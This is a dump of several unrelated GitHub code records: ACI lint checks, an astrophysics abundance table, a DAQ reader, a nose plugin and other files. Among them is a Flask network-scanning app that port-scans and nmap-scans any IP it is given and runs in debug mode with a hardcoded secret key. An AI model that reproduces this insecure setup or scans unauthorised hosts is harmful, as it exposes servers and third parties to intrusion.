in self.tenants:\n contracts = []\n for contract in tenant.get_children(Contract):\n contracts.append(contract.name)\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n provided = epg.get_all_provided()\n for contract in provided:\n if contract.name in contracts:\n contracts.remove(contract.name)\n for contract in contracts:\n self.output_handler(\"Warning 006: Contract '%s' in Tenant '%s' is not\"\n \" provided at all.\" % (contract, tenant.name))\n\n def warning_007(self):\n \"\"\"\n W007: Contract is not consumed at all.\n \"\"\"\n for tenant in self.tenants:\n contracts = []\n for contract in tenant.get_children(Contract):\n contracts.append(contract.name)\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n consumed = epg.get_all_consumed()\n for contract in consumed:\n if contract.name in contracts:\n contracts.remove(contract.name)\n for contract in contracts:\n self.output_handler(\"Warning 007: Contract '%s' in Tenant '%s' is not\"\n \" consumed at all.\" % (contract, tenant.name))\n\n def warning_008(self):\n \"\"\"\n W008: EPG providing contracts but in a Context with no enforcement.\n \"\"\"\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n for epg in 
app.get_children(EPG):\n if len(epg.get_all_provided()):\n if epg.has_bd():\n bd = epg.get_bd()\n if bd.has_context():\n context = bd.get_context()\n if context.get_allow_all():\n self.output_handler(\"Warning 008: EPG '%s' providing \"\n \"contracts in Tenant '%s', App\"\n \"Profile '%s' but Context '%s' \"\n \"is not enforcing.\" % (epg.name,\n tenant.name,\n app.name,\n context.name))\n\n def warning_010(self):\n \"\"\"\n W010: EPG providing contract but consuming EPG is in a different\n context.\n \"\"\"\n provide_db = {}\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if epg.has_bd():\n bd = epg.get_bd()\n if bd.has_context():\n context = bd.get_context()\n provided = epg.get_all_provided()\n for contract in provided:\n if tenant.name not in provide_db:\n provide_db[tenant.name] = {}\n if contract.name not in provide_db[tenant.name]:\n provide_db[tenant.name][contract.name] = []\n if context.name not in provide_db[tenant.name][contract.name]:\n provide_db[tenant.name][contract.name].append(context.name)\n\n for tenant in self.tenants:\n if tenant.name not in provide_db:\n self.output_handler(\"Warning 010: No contract provided within\"\n \" this tenant '%s'\" % tenant.name)\n continue # don't repeat this message for each option below.\n epgs = []\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n epgs.append(epg)\n for epg in epgs:\n if epg.has_bd():\n bd = epg.get_bd()\n if bd.has_context():\n context = bd.get_context()\n consumed = epg.get_all_consumed()\n for contract in consumed:\n if contract.name not in provide_db[tenant.name]:\n self.output_handler(\"Warning 010: Contract '%s' not provided \"\n \"within the same tenant \"\n \"'%s'\" % (contract.name, tenant.name))\n elif context.name not in provide_db[tenant.name][contract.name]:\n self.output_handler(\"Warning 010: Contract '%s' not provided in context '%s' \"\n \"where it is being consumed for\"\n \" tenant '%s'\" % (contract.name, context.name, tenant.name))\n\n @staticmethod\n def subj_matches_proto(filterlist, protocol):\n \"\"\"\n This routine will return True/False if the list of filters has a filter\n that matches the specified protocol.\n\n :param filterlist: The list of filters to inspect.\n :param protocol: The protocol we are looking for.\n \"\"\"\n for subjfilter in filterlist:\n for entry in subjfilter.get_children(FilterEntry):\n entryAttrs = entry.get_attributes()\n if entryAttrs['prot'] == protocol:\n return True\n return False\n\n def warning_011(self):\n \"\"\"\n W011: Contract has Bidirectional TCP Subjects.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n is_tcp_bidi = 0\n for subject in contract.get_children(ContractSubject):\n if self.subj_matches_proto(subject.get_filters(), 'tcp'):\n is_tcp_bidi = 3\n break\n\n in_terminal = subject.get_children(InputTerminal)\n out_terminal = subject.get_children(OutputTerminal)\n if in_terminal:\n in_filterlist = in_terminal[0].get_filters()\n else:\n in_filterlist = ()\n if out_terminal:\n out_filterlist = out_terminal[0].get_filters()\n else:\n out_filterlist = ()\n\n if in_filterlist:\n if self.subj_matches_proto(in_filterlist, 'tcp'):\n is_tcp_bidi = 1\n if out_filterlist:\n if self.subj_matches_proto(out_filterlist, 'tcp'):\n is_tcp_bidi += 1\n # Otherwise, either there are no terminals so it's a permit\n # everything which doesn't count.\n\n if is_tcp_bidi:\n break\n\n if is_tcp_bidi == 3:\n self.output_handler(\"Warning 
011: In tenant '%s' contract \"\n \"'%s' is a Bidirectional TCP contract.\"\n % (tenant.name, contract.name))\n elif is_tcp_bidi == 2:\n self.output_handler(\"Warning 011: In tenant '%s' contract \"\n \"'%s' is an explictly \"\n \"Bidirectional TCP contract.\"\n % (tenant.name, contract.name))\n\n def warning_012(self):\n \"\"\"\n W012: Contract has Bidirectional UDP Subjects.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n is_udp_bidi = 0\n for subject in contract.get_children(ContractSubject):\n if self.subj_matches_proto(subject.get_filters(), 'udp'):\n is_udp_bidi = 3\n break\n\n in_terminal = subject.get_children(InputTerminal)\n out_terminal = subject.get_children(OutputTerminal)\n if in_terminal:\n in_filterlist = in_terminal[0].get_filters()\n else:\n in_filterlist = ()\n if out_terminal:\n out_filterlist = out_terminal[0].get_filters()\n else:\n out_filterlist = ()\n\n if in_filterlist:\n if self.subj_matches_proto(in_filterlist, 'udp'):\n is_udp_bidi = 1\n if out_filterlist:\n if self.subj_matches_proto(out_filterlist, 'udp'):\n is_udp_bidi += 1\n # Otherwise, either there are no terminals so it's a permit\n # everything which doesn't count.\n\n if is_udp_bidi:\n break\n\n if is_udp_bidi == 3:\n self.output_handler(\"Warning 012: In tenant '%s' contract \"\n \"'%s' is a Bidirectional UDP contract.\"\n % (tenant.name, contract.name))\n elif is_udp_bidi == 2:\n self.output_handler(\"Warning 012: In tenant '%s' contract \"\n \"'%s' is an explictly \"\n \"Bidirectional UDP contract.\"\n % (tenant.name, contract.name))\n\n def warning_013(self):\n \"\"\"\n W013: Contract has no Subjects.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n if len(contract.get_children(ContractSubject)) == 0:\n self.output_handler(\"Warning 013: In tenant '%s' contract \"\n \"'%s' has no Subjects.\"\n % (tenant.name, contract.name))\n\n def warning_014(self):\n \"\"\"\n W014: Contract has Subjects with no Filters.\n \"\"\"\n for tenant in self.tenants:\n for contract in tenant.get_children(Contract):\n missing_filter = False\n for subject in contract.get_children(ContractSubject):\n if len(subject.get_filters()) == 0:\n # No directly attached filters...\n for terminal in subject.get_children(InputTerminal):\n if len(terminal.get_filters()) == 0:\n for out_terminal in subject.get_children(OutputTerminal):\n if len(out_terminal.get_filters()) == 0:\n missing_filter = True\n if missing_filter:\n self.output_handler(\"Warning 014: In tenant '%s' contract \"\n \"'%s' subject '%s' has no Filters.\" % (tenant.name,\n contract.name,\n subject.name))\n\n def error_001(self):\n \"\"\"\n E001: BridgeDomain has no Context\n \"\"\"\n for tenant in self.tenants:\n for bd in tenant.get_children(BridgeDomain):\n if not bd.has_context():\n self.output_handler(\"Error 001: BridgeDomain '%s' in tenant '%s' \"\n \"has no Context assigned.\" % (bd.name, tenant.name))\n\n def error_002(self):\n \"\"\"\n E002: EPG has no BD assigned.\n \"\"\"\n for tenant in self.tenants:\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if not epg.has_bd():\n self.output_handler(\"Error 002: EPG '%s' in Tenant '%s', \"\n \"AppProfile '%s' has no BridgeDomain \"\n \"assigned.\" % (epg.name, tenant.name,\n app.name))\n\n def error_004(self):\n # E004: EPG not assigned to an interface or VMM domain\n pass\n\n def error_005(self):\n \"\"\"\n E005: Overlapping subnets are defined in a single context.\n Note: Only subnets inside the 
fabric are inspected.\n \"\"\"\n for tenant in self.tenants:\n context_info = {}\n for bd in tenant.get_children(BridgeDomain):\n current_context = bd.get_context()\n if not current_context:\n # BridgeDomain has no Context so ignore it.\n continue\n if current_context not in context_info:\n context_info[current_context] = {'v4list': [],\n 'v6list': []}\n for subnet in bd.get_subnets():\n try:\n ip_subnet = ipaddress.ip_network(unicode(subnet.addr),\n strict=False)\n except NameError:\n # Python3 doesn't support unicode anymore\n ip_subnet = ipaddress.ip_network(str(subnet.addr),\n strict=False)\n index = 0\n index_to_insert = 0\n if ip_subnet.version == 4:\n address_list = context_info[current_context]['v4list']\n else:\n address_list = context_info[current_context]['v6list']\n\n while index < len(address_list):\n if ip_subnet == address_list[index]['addr']:\n index_to_insert = index\n if bd.name != address_list[index]['bd']:\n # Because sometimes they are equal...\n self.output_handler(\n \"Error 005: In tenant/context '{}/{}': \"\n \"subnet {} in BridgeDomain '{}' \"\n \"duplicated by subnet {} in BridgeDomain \"\n \"'{}'\".format(tenant.name,\n current_context,\n ip_subnet.with_prefixlen,\n bd.name,\n address_list[index][\n 'addr'].with_prefixlen,\n address_list[index]['bd']))\n elif ip_subnet < address_list[index]['addr']:\n index_to_insert = index + 1\n if ip_subnet.overlaps(address_list[index]['addr']):\n self.output_handler(\n \"Error 005: In tenant/context '{}/{}': \"\n \"subnet {} in BridgeDomain '{}' \"\n \"contains subnet {} in BridgeDomain \"\n \"'{}'\".format(tenant.name,\n current_context,\n ip_subnet.with_prefixlen,\n bd.name,\n address_list[index - 1][\n 'addr'].with_prefixlen,\n address_list[index - 1]['bd']))\n else:\n break\n elif address_list[index]['addr'].overlaps(ip_subnet):\n index_to_insert = index\n self.output_handler(\"Error 005: In tenant/context \"\n \"'{}/{}': subnet {} in \"\n \"BridgeDomain '{}' contains \"\n \"subnet {} in BridgeDomain \"\n \"'{}'\".format(tenant.name,\n current_context,\n address_list[index][\n 'addr'].with_prefixlen,\n address_list[index]['bd'],\n ip_subnet.with_prefixlen,\n bd.name))\n break\n index += 1\n if index_to_insert:\n address_list.insert(index_to_insert, {'addr': ip_subnet,\n 'bd': bd.name})\n else:\n address_list.insert(index, {'addr': ip_subnet,\n 'bd': bd.name})\n\n def error_006(self):\n \"\"\"\n E006: Check for duplicated subnets in ExternalNetworks.\n\n Check to ensure that the same subnet is not defined in two separate\n ExternalNetworks or between an ExternalNetwork and a BD within a\n single VRF. 
Overlapping but not the equal subnets are not a problem.\n \"\"\"\n for tenant in self.tenants:\n context_set = {}\n for l3out in tenant.get_children(OutsideL3):\n current_ctxt = l3out.get_context()\n if not current_ctxt:\n # OutsideL3 Network has no Context so ignore it.\n continue\n if current_ctxt.name not in context_set:\n context_set[current_ctxt.name] = {}\n current_subnets = context_set[current_ctxt.name]\n\n for extnet in l3out.get_children(OutsideEPG):\n for subnet in extnet.get_children(OutsideNetwork):\n if subnet.addr in current_subnets:\n current_subnets[subnet.addr].append(\n \"{}/{}/{}/{}\".format(tenant.name,\n current_ctxt.name,\n l3out.name,\n extnet.name))\n else:\n current_subnets[subnet.addr] = [\n \"{}/{}/{}/{}\".format(tenant.name,\n current_ctxt.name,\n l3out.name,\n extnet.name)]\n for current_ctxt in context_set:\n for subnet in context_set[current_ctxt]:\n if 1 < len(context_set[current_ctxt][subnet]):\n for subnet_info in context_set[current_ctxt][subnet]:\n self.output_handler(\n \"Error 006: In Tenant/Context/L3Out/ExtEPG \"\n \"'{}' found duplicate subnet {}.\".format(\n subnet_info, subnet))\n\n for bd in tenant.get_children(BridgeDomain):\n bd_ctxt = bd.get_context()\n if not bd_ctxt:\n # BridgeDomain has no Context so ignore it.\n continue\n if bd_ctxt.name not in context_set:\n # BridgeDomain Context has no associated ExternalNetworks so ignore it.\n continue\n for subnet in bd.get_subnets():\n ip_subnet = ipaddress.ip_network(str(subnet.addr),\n strict=False)\n ip_subnet_str = ip_subnet.network_address\n if ip_subnet_str in context_set[bd_ctxt.name]:\n for subnet_info in context_set[bd_ctxt.name][ip_subnet_str]:\n self.output_handler(\n \"Error 006: Subnet {0:s} in \"\n \"Tenant/Context/BridgeDomain '{}/{}/{}' \"\n \"conflicts with subnet {} in \"\n \"Tenant/Context/L3Out/ExtEPG '{}'.\".format(\n ip_subnet.with_prefixlen, tenant.name,\n bd_ctxt.name, bd.name, ip_subnet_str,\n subnet_info))\n\n def critical_001(self):\n \"\"\"\n This is an example of a compliance check where all EPGs are expected\n to be tagged with either 'secure' or 'nonsecure' and secure EPGs are\n not allowed to provide or consume contracts from nonsecure EPGs.\n \"\"\"\n for tenant in self.tenants:\n # Look at all the EPGs and verify that they are all\n # assigned a security level\n secure_epgs = []\n nonsecure_epgs = []\n for app in tenant.get_children(AppProfile):\n for epg in app.get_children(EPG):\n if not self.ensure_tagged([epg], ('secure', 'nonsecure')):\n self.output_handler(\"Critical 001: EPG '%s' in tenant '%s' \"\n \"app '%s' is not assigned security \"\n \"clearance\" % (epg.name, tenant.name, app.name))\n if epg.has_tag('secure'):\n if epg.has_tag('nonsecure'):\n self.output_handler(\"Critical 001: EPG '%s' in tenant '%s' \"\n \"app '%s' is assigned secure and nonsecure security \"\n \"clearance\" % (epg.name, tenant.name, app.name))\n # Squirrel away the Secure EPGs\n secure_epgs.append(epg)\n else:\n nonsecure_epgs.append(epg)\n\n # Verify that the secure EPGs are only providing/consuming from\n # secure EPGs\n for secure_epg in secure_epgs:\n for contract in secure_epg.get_all_provided():\n for nonsecure_epg in nonsecure_epgs:\n if nonsecure_epg.does_consume(contract):\n self.output_handler(\"Critical 001: Nonsecure EPG '%s' in tenant '%s' \"\n \"is consuming secure contract from 'EPG' %s\" % (nonsecure_epg.name,\n tenant.name,\n secure_epg.name))\n for contract in secure_epg.get_all_consumed():\n for nonsecure_epg in nonsecure_epgs:\n if 
nonsecure_epg.does_provide(contract):\n self.output_handler(\"Critical 001: Nonsecure EPG '%s' in tenant '%s' \"\n \"is providing contract to secure EPG '%s'\" % (nonsecure_epg.name,\n tenant.name,\n secure_epg.name))\n\n def execute(self, methods):\n for method in methods:\n getattr(self, method)()\n\n\ndef acilint():\n \"\"\"\n Main execution routine\n\n :return: None\n \"\"\"\n description = ('acilint - A static configuration analysis tool. '\n 'Checks can be individually disabled by generating'\n ' and editing a configuration file. If no config '\n 'file is given, all checks will be run.')\n creds = Credentials('apic', description)\n creds.add_argument('-c', '--configfile', type=argparse.FileType('r'))\n creds.add_argument('-g', '--generateconfigfile',\n type=argparse.FileType('w'))\n creds.add_argument('-o', '--output', required=False, default='console')\n args = creds.get()\n if args.generateconfigfile:\n print('Generating configuration file....')\n f = args.generateconfigfile\n f.write(('# acilint configuration file\\n# Remove or comment out any '\n 'warnings or errors that you no longer wish to see\\n'))\n methods = dir(Checker)\n for method in methods:\n if method.startswith(('warning_', 'critical_', 'error_')):\n f.write(method + '\\n')\n f.close()\n sys.exit(0)\n\n methods = []\n if args.configfile:\n f = args.configfile\n for line in f:\n method = line.split('\\n')[0]\n if method in dir(Checker) and method.startswith(('warning_', 'error_', 'critical_')):\n methods.append(method)\n f.close()\n else:\n for method in dir(Checker):\n if method.startswith(('warning_', 'error_', 'critical_')):\n methods.append(method)\n\n if args.snapshotfiles:\n session = FakeSession(filenames=args.snapshotfiles)\n else:\n # Login to APIC\n session = Session(args.url, args.login, args.password)\n resp = session.login()\n if not resp.ok:\n print('%% Could not login to APIC')\n sys.exit(0)\n\n html = None\n if args.output == 'html':\n print('Creating file lint.html')\n html = open('lint.html', 'w')\n html.write(\"\"\"\n \n \n \n \n \n \n \"\"\")\n\n checker = Checker(session, args.output, html)\n checker.execute(methods)\n\n\nif __name__ == \"__main__\":\n acilint()\n","repo_name":"datacenter/acitoolkit","sub_path":"applications/lint/acilint.py","file_name":"acilint.py","file_ext":"py","file_size_in_byte":31285,"program_lang":"python","lang":"en","doc_type":"code","stars":341,"dataset":"github-code","pt":"81"} +{"seq_id":"37901803590","text":"\nimport numpy as np\nimport pandas as pd\n\n# Table 1.4 in Draine (2011) : Protosolar abundances of the Elements with $Z <= 32$\n# (based on Asplund+2009)\n\nclass AbundanceSolar(object):\n def __init__(self, xHe=9.55e-2, Zprime=1.0):\n\n self.Zprime = Zprime\n \n data = {'Z': np.arange(32) + 1,\n 'X': np.array([ 'H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O',\n 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S',\n 'Cl', 'Ar', 'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr',\n 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge']),\n 'mX_amu': np.array([ 1.008, 4.0026, 6.941, 9.012, 10.811, 12.011, 14.007, 15.999,\n 18.998, 20.180, 22.990, 24.305, 26.982, 28.086, 30.974, 32.065,\n 35.453, 39.948, 39.098, 40.078, 44.956, 47.867, 50.942, 51.996,\n 54.938, 55.845, 58.933, 58.693, 63.546, 65.380, 69.723, 72.640]),\n 'NX_NH': np.array([1.0, 9.55e-2, 2.00e-9, 2.19e-11, 6.76e-10, 2.95e-4, 7.41e-5, 5.37e-4,\n 2.88e-8, 9.33e-5, 2.04e-6, 4.37e-5, 2.95e-6, 3.55e-5, 3.23e-7, 1.45e-5,\n 1.86e-7, 2.75e-6, 1.32e-7, 2.14e-6, 1.23e-9, 8.91e-8, 1.00e-8, 4.79e-7,\n 3.31e-7, 3.47e-5, 8.13e-8, 1.74e-6, 1.95e-8, 
4.68e-8, 1.32e-9, 4.17e-9])\n }\n \n df = pd.DataFrame.from_dict(data)\n\n # Adjust Helium abundance\n df.loc[df['X'] == 'He', 'NX_NH'] = xHe\n\n # Scale metal abundance by Zprime\n df.loc[df['Z'] > 2, 'NX_NH'] *= self.Zprime\n\n # Mass [amu] for nH=1 \n df['MX_per_H'] = df['mX_amu']*df['NX_NH']\n\n # Mass fraction\n # divide by MH = 1.008 amu so that MX_MH = 1.0 for H\n df['MX_MH'] = df['MX_per_H']/df.loc[0, 'MX_per_H']\n\n self.df = df\n\n def get_XYZ_muH_mu(self):\n \"\"\"Compute XYZ, muH, and mu.\n Dust depletion is ignored.\n \"\"\"\n \n df = self.df\n xHe = df[df['X'] == 'He']['NX_NH'].iloc[0]\n xMetal = df[df['Z'] > 2]['NX_NH'].sum()\n\n # Total mass (in units of amu) per H\n Mtot = df['MX_per_H'].sum()\n \n # Mean molecular weight per H (in units of mH)\n muH = Mtot/1.008\n \n # Mass fraction of H, He, and Metals\n X = df[df['X'] == 'H']['MX_MH'].iloc[0]/Mtot\n Y = df[df['X'] == 'He']['MX_MH'].iloc[0]/Mtot\n Z = df[df['Z'] > 2]['MX_MH'].sum()/Mtot\n\n # Mean molecular weight (per particle)\n # Fully atomic\n mu_atom = df['MX_MH'].sum()/df['NX_NH'].sum()\n\n # Fully ionized\n xe_ion = (df['NX_NH']*df['Z']).sum()\n mu_ion = df['MX_MH'].sum()/(df['NX_NH']*(1.0 + df['Z'])).sum()\n\n # print('xHe, xMetal, X, Y, Z, muH')\n # print(xHe, xMetal, X, Y, Z, muH)\n\n res = dict()\n res['xHe'] = xHe\n res['xMetal'] = xMetal\n res['X'] = X\n res['Y'] = Y\n res['Z'] = Z\n res['muH'] = muH\n res['mu_atom'] = mu_atom\n res['mu_ion'] = mu_ion\n res['xe_ion'] = xe_ion\n res['df'] = df\n \n return res\n\n\n","repo_name":"jeonggyukim/pyathena","sub_path":"pyathena/microphysics/abundance_solar.py","file_name":"abundance_solar.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"15100456976","text":"start = int(input())\n\nresult = 0\nif start == 1:\n A = 1\n B = 2\nelse :\n B = 1\n A = 2 \n\nA_list = []\nB_list = []\nwin_dict = {\n 1:[[1,1],[1,2],[1,3]],\n }\n\nwhile result == 0:\n A_x, A_y = map(int, input().split())\n B_x, B_y = map(int, input().split())\n\n A_list.append([A_x,A_y])\n B_list.append([B_x,B_y])\n\n # print(A_list)\n # print(B_list)\n\n \n\n\n\n\n\n\n","repo_name":"choihyeonseok/algo","sub_path":"bj/12759.PY","file_name":"12759.PY","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41166062187","text":"import pandas as pd\nfrom multiprocessing import Pool\nimport os\ndef read_daq(file_path):\n\ttry:\n\t#file_path = r'C:\\Users\\ian.jacobi\\Documents\\ltere\\G5 NIAGARA NL1201.txt'\n\t\tfile_name = file_path.split('\\\\')[-1]\n\t\tdf= pd.read_csv(file_path, sep = '\\t', skiprows =7, usecols = [0,1,2,3,4,5,6,])\n\t\tdf.columns = ['Date', 'Time', 'Mean Flue Temp', 'Mean Hot Water', 'Mean Inlet Water', 'Mean Inlet Air', ' Unused']\n\t\tstation = file_name.split(' ')[0]\n\t\tdf[\"Station\"] = station\n\t\tdf.Date = pd.to_datetime(df.Date, infer_datetime_format=True).dt.date\n\t\tstart_date = df.Date.values[0]\n\t\tprint(start_date)\n\t\tstart_week = start_date.isocalendar()[1]\n\t\tdf[\"Week\"] = [f.isocalendar()[1] + (((f.year-start_date.year)* 52)) - (start_week ) for f in df.Date.values.tolist()]\n\t\tresult_dir = 'C:/Niagara/DAQ/'\n\t\tif not os.path.exists(result_dir):\n\t\t\tos.mkdir(reult_dir)\n\t\tdf.to_csv('C:/Niagara/DAQ/' + file_name[:-4] + '.csv')\n\texcept Exception as e:\n\t\traise e\nif __name__ == '__main__':\n\tpool = Pool()\n\tfiles = [f.path for f in 
os.scandir(r'\\\\onerheem\\whd-onerheemdfs\\Data on BDATAPROD2\\RDDEPT\\Satellite Lab\\Reliability EC Folders\\EC06619 -NIAGARA 2018 TAKASHI\\NL TESTING 2018\\Station data')]\n\tprint(files)\n\n\tpool.map(read_daq, files)","repo_name":"LilyKeeter/Reliability","sub_path":"NiagaraRel&Field/run_DAQ.py","file_name":"run_DAQ.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31579582671","text":"from flask import Flask, render_template, request, redirect, url_for, session\n\nimport socket\nimport requests\nimport re\nimport subprocess\n\n\napp = Flask(__name__)\napp.secret_key = 'your_secret_key'\n\ndef scan_ports(target, ports):\n open_ports = []\n for port in ports:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(1)\n result = sock.connect_ex((target, port))\n if result == 0:\n open_ports.append(port)\n sock.close()\n return open_ports\n\ndef check_clickjacking_vulnerability(url):\n try:\n response = requests.get(url, allow_redirects=True)\n response.raise_for_status()\n\n headers = response.headers\n\n if 'X-Frame-Options' in headers:\n clickjacking_status = \"Not vulnerable to Clickjacking\"\n else:\n clickjacking_status = \"Vulnerable to Clickjacking\"\n\n return clickjacking_status\n\n except requests.RequestException as e:\n return f\"Error accessing website: {e}\"\n\ndef check_sql_injection(input_string):\n sql_injection_pattern = re.compile(r'\\b(union|select|from|where|and|or)\\b', re.IGNORECASE)\n if sql_injection_pattern.search(input_string):\n return \"Potential SQL Injection detected\"\n else:\n return \"No SQL Injection detected\"\n\ndef check_patch_status(software_version):\n # Example: Check if the software version is up-to-date\n latest_version = \"2.0\"\n if software_version == latest_version:\n return \"Software is up-to-date\"\n else:\n return f\"Software update available. Latest version: {latest_version}\"\n\ndef apply_patch(software_version):\n # Placeholder: Simulate applying a patch\n updated_version = \"2.0\"\n return f\"update version available to update {updated_version}\"\n\ndef run_nmap_scan(target_ip):\n try:\n result = subprocess.run(['nmap', '-p-', '--open', target_ip], capture_output=True, text=True)\n open_ports_lines = re.findall(r'(\\d+\\/[a-zA-Z]+)\\s+open.*', result.stdout)\n open_ports = \"\\n\".join(open_ports_lines) if open_ports_lines else \"No open ports found\"\n return open_ports\n except FileNotFoundError:\n return \"Nmap not found. 
Make sure Nmap is installed on your system.\"\n\n@app.route('/')\n\ndef index():\n return render_template('index.html')\n\n@app.route('/scan', methods=['POST'])\ndef scan():\n target_ip = request.form['target_ip']\n website_url = request.form['website_url']\n software_version = request.form['software_version']\n port_option = request.form['port_option']\n\n open_ports = None # Default value\n\n if port_option == 'specific_ports':\n ports_to_scan = [int(port) for port in request.form['ports'].split(',')]\n open_ports = scan_ports(target_ip, ports_to_scan)\n nmap_result = None\n else:\n nmap_result = run_nmap_scan(target_ip)\n\n # Perform vulnerability assessment\n clickjacking_status = check_clickjacking_vulnerability(website_url)\n sql_injection_status = check_sql_injection(website_url)\n patch_status = check_patch_status(software_version)\n\n # Store relevant information in session to pass to /patch\n patch_info = {\n 'patch_result': patch_status,\n 'current_version': software_version,\n 'updated_version': '2.0', # Assuming the updated version for simplicity\n 'update_message': 'Update available! Latest version: 2.0',\n 'update_icon': 'exclamation-triangle'\n }\n session['patch_info'] = patch_info\n return render_template('result.html', clickjacking_status=clickjacking_status,\n sql_injection_status=sql_injection_status, nmap_result=nmap_result,\n open_ports=open_ports)\n # return redirect(url_for('patch'))\n\n\n@app.route('/patch')\ndef patch():\n # Retrieve the patch result, current_version, and updated_version from the session\n patch_info = session.get('patch_info', {})\n patch_result = patch_info.get('patch_result', '')\n current_version = patch_info.get('current_version', '')\n updated_version = patch_info.get('updated_version', '')\n update_message = patch_info.get('update_message', '')\n update_icon = patch_info.get('update_icon', '')\n \n # Render the patch_result.html template with the patch result and version information\n return render_template('patch.html', patch_result=patch_result, current_version=current_version,\n updated_version=updated_version, update_message=update_message, update_icon=update_icon)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80, debug=True)","repo_name":"Uusa4303/Vulnerabilityassessment-patchmanagement","sub_path":"Web app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74098318346","text":"import logging\nimport os\n\nfrom nose.plugins import Plugin\n\nfrom nose_blame.blame import BlameList\n\nclass BlamePlugin(Plugin):\n enabled = False\n name = 'blame'\n score = 0\n\n def options(self, parser, env=os.environ):\n super(BlamePlugin, self).options(parser, env=env)\n\n env_opt = 'NOSE_BLAME_FILE'\n parser.add_option('--blame-file', action='store', type='string',\n dest='blame_file', default=env.get(env_opt, None),\n help='Path that blame json file will be written to.')\n\n\n def configure(self, options, conf):\n super(BlamePlugin, self).configure(options, conf)\n self.conf = conf\n\n if not self.enabled or not self.can_configure: return\n self.blame_file = getattr(options, 'blame_file', None)\n\n def begin(self):\n self.blame_list = BlameList()\n\n def handleError(self, test, err):\n case_owners = getattr(test.test, 'case_owners', [])\n suite_owners = getattr(test.test, 'suite_owners', [])\n self.blame_list.add_error(test.id(), err, case_owners=case_owners, suite_owners=suite_owners)\n\n def 
handleFailure(self, test, err):\n case_owners = getattr(test.test, 'case_owners', [])\n suite_owners = getattr(test.test, 'suite_owners', [])\n self.blame_list.add_failure(test.id(), err, case_owners=case_owners, suite_owners=suite_owners)\n\n def finalize(self, result):\n if self.blame_file:\n fd = open(self.blame_file, 'w')\n fd.write(self.blame_list.write_json())\n fd.close()\n else:\n print(self.blame_list.write_json(indent=2, sort_keys=True))\n return None\n","repo_name":"pubnub/nose-blame","sub_path":"src/nose_blame/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30190738354","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass MonitorRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, ticker: str=None, event_type: str=None): # noqa: E501\n \"\"\"MonitorRequest - a model defined in Swagger\n\n :param ticker: The ticker of this MonitorRequest. # noqa: E501\n :type ticker: str\n :param event_type: The event_type of this MonitorRequest. # noqa: E501\n :type event_type: str\n \"\"\"\n self.swagger_types = {\n 'ticker': str,\n 'event_type': str\n }\n\n self.attribute_map = {\n 'ticker': 'ticker',\n 'event_type': 'eventType'\n }\n self._ticker = ticker\n self._event_type = event_type\n\n @classmethod\n def from_dict(cls, dikt) -> 'MonitorRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The MonitorRequest of this MonitorRequest. 
# noqa: E501\n :rtype: MonitorRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def ticker(self) -> str:\n \"\"\"Gets the ticker of this MonitorRequest.\n\n\n :return: The ticker of this MonitorRequest.\n :rtype: str\n \"\"\"\n return self._ticker\n\n @ticker.setter\n def ticker(self, ticker: str):\n \"\"\"Sets the ticker of this MonitorRequest.\n\n\n :param ticker: The ticker of this MonitorRequest.\n :type ticker: str\n \"\"\"\n if ticker is None:\n raise ValueError(\"Invalid value for `ticker`, must not be `None`\") # noqa: E501\n\n self._ticker = ticker\n\n @property\n def event_type(self) -> str:\n \"\"\"Gets the event_type of this MonitorRequest.\n\n\n :return: The event_type of this MonitorRequest.\n :rtype: str\n \"\"\"\n return self._event_type\n\n @event_type.setter\n def event_type(self, event_type: str):\n \"\"\"Sets the event_type of this MonitorRequest.\n\n\n :param event_type: The event_type of this MonitorRequest.\n :type event_type: str\n \"\"\"\n allowed_values = [\"downCross50MA\", \"upCross50MA\", \"downCross100MA\", \"upCross100MA\", \"downCross10MA\", \"upCross10MA\", \"downCross200MA\", \"upCross200MA\"] # noqa: E501\n if event_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `event_type` ({0}), must be one of {1}\"\n .format(event_type, allowed_values)\n )\n\n self._event_type = event_type\n","repo_name":"qianzhang-dev/AutoTrader","sub_path":"srv/swagger_server/models/monitor_request.py","file_name":"monitor_request.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41480033437","text":"\"\"\"\nA maximally simple solution to CT / CTA 